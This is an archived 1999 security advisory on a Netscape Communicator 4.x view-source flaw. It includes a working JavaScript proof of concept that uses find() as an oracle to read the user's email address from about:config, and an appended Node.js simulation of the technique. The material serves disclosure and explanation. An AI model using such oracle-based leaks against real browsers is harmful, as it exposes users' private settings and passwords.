Netscape Communicator "view-source:" security vulnerabilities

From: Georgi Guninski (joroat_private)
Date: Tue Jun 01 1999 - 09:08:49 PDT


    There is a security vulnerability in Netscape Communicator 4.6 Win95,
    4.07 Linux (probably all 4.x versions) in the way
    it works with "view-source:wysiwyg://1/javascript" URLs. It parses them
    in a "view-source" window.
    The problem is that it allows access to documents included in the parent
    document via
    ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading
    the whole parsed document.
    
    Vulnerabilities:
    
     Browsing local directories
     Reading user's cache
     Reading parsed HTML files
     Reading Netscape's configuration ("about:config") including user's
    email address, mail servers and password.
     Probably others
    
    This vulnerability may be exploited by using an HTML email message.
    
    Workaround: Disable JavaScript
    Netscape has been notified about the problem.
    
    Demonstration is available at: http://www.nat.bg/~joro/viewsource.html
    
    Regards,
    Georgi Guninski
     http://www.nat.bg/~joro
     http://www.whitehats.com/guninski
    Attachment: viewsource.html (text/html)
    
    <HTML>
    <BODY>
    There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way
    it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window.
    The problem is that it allows access to documents included in the parent document via
    ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document.
    <BR>
    Vulnerabilities:
    <HR>
     Browsing local directories<BR>
     Reading user's cache<BR>
     Reading parsed HTML files<BR>
     Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.<BR>
     Probably others<BR>
    <BR>
    This vulnerability may be exploited by using an HTML email message.
    <HR>
    Workaround: Disable JavaScript
    <HR>
    This demonstration tries to find your email address, it may take some time.
    <BR><BR>
    <A HREF="http://www.nat.bg/~joro">Written by Georgi Guninski</A>
    <HR>
    <SCRIPT>
    // Build a "view-source:wysiwyg://1/javascript:" URL. The JavaScript in it runs in
    // the view-source window and writes a page that pulls about:config (again under
    // view-source:) into an ILAYER, so that find() can search its text.
    s="view-source:wysiwyg://1/javascript:s='<TITLE>tttt</TITLE>vvvv&gt&gt"
    +"<ILAYER SRC=\"view-source:wysiwyg://1/about:config\"></ILAYER>"
    // mend: marker used to position the search; mag: the preference whose value is wanted.
    +" <SCRIPT>blur();msg1=\"Your email is: \"; mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;"
    +"setTimeout(\" "
    // Extend the known prefix one character at a time: find() answers whether
    // prefix + candidate occurs in the included document, i.e. it is a yes/no oracle.
    +"for(i=0;i<charstoread;i++) {"
    +" t=res;"
    +" find(mend);"
    +" for(c=1;c<256;c++) {"
    +"   t=res + String.fromCharCode(c);"
    +"     if (find(t,true,true)) {"
    +"      res=t;"
    +"      if (c==32) i=charstoread+1"   // a space ends the value: stop the outer loop
    +"     } "
    +" }"
    +"}"
    +"res=res.substring(mag.length);"
    +"alert(msg1 + res);"
    +" ;\",3000);</"+"SCRIPT>'";
    //a=window.open(s);
    location=s;
    </SCRIPT>
    
    </BODY>
    </HTML>
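The extraction loop in the attached demonstration treats the browser's find() as a yes/no oracle: it knows the text that precedes the secret ("mail.identity.useremail = "), appends one candidate byte at a time and keeps the candidate that find() reports as present. The following is an added example, not part of Guninski's post, that simulates that oracle in Node.js over a constructed stand-in for the about:config text so the prefix-extension technique can be run offline. The document text, the preference values, and the names makeFindOracle and extractAfterPrefix are all assumptions made for the example; the real find() in Netscape 4.x also had to be repositioned with find(mend) each round, which the simulation does not need.

```javascript
// Added example (not Georgi Guninski's code): simulate the find()-oracle
// extraction loop from the advisory against a constructed document.
// Assumption: the only thing the attacker can do is ask "does this
// substring occur in the target document?", which is what window.find()
// answered in Netscape 4.x, and a known prefix precedes the secret.

// Constructed stand-in for what "view-source:wysiwyg://1/about:config"
// rendered; the preference values are made up for this example.
const CONSTRUCTED_ABOUT_CONFIG = [
  'general.title_tips = true',
  'mail.identity.useremail = alice@example.org',
  'mail.server.host = mail.example.org',
  'network.proxy.type = 0',
].join('\n');

// The oracle: true if `needle` occurs anywhere in the document, nothing else.
function makeFindOracle(doc) {
  return (needle) => doc.indexOf(needle) !== -1;
}

// Extend `prefix` one byte at a time, trying codes 1..255 exactly as the
// advisory's inner loop does. Each recovered character costs at most 255
// oracle calls. Extraction stops at a whitespace character (the advisory
// stops at a space), when no byte extends the prefix (prefix absent, or end
// of document), or after `maxChars` characters.
function extractAfterPrefix(find, prefix, { maxChars = 50, stopChars = ' \r\n\t' } = {}) {
  let res = prefix;
  let queries = 0;
  let done = false;
  for (let i = 0; i < maxChars && !done; i++) {
    let extended = false;
    for (let c = 1; c < 256; c++) {
      const ch = String.fromCharCode(c);
      queries++;
      if (!find(res + ch)) continue;
      if (stopChars.includes(ch)) {
        done = true;          // terminator reached; do not include it
      } else {
        res += ch;            // oracle confirmed this byte follows the prefix
      }
      extended = true;
      break;
    }
    if (!extended) done = true;
  }
  return {
    value: res.slice(prefix.length),
    queries,
    truncated: !done,         // hit maxChars before a terminator
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  const find = makeFindOracle(CONSTRUCTED_ABOUT_CONFIG);
  const r = extractAfterPrefix(find, 'mail.identity.useremail = ');
  console.log(`recovered "${r.value}" with ${r.queries} find() calls`);
}
```

The cost is linear in the length of the secret (roughly one find() call per possible byte value per character), which is why the original demonstration warns that it "may take some time" and caps the loop at 50 characters; any boolean text-search primitive that is allowed to look into another document gives the same leak.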



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:48:01 PDT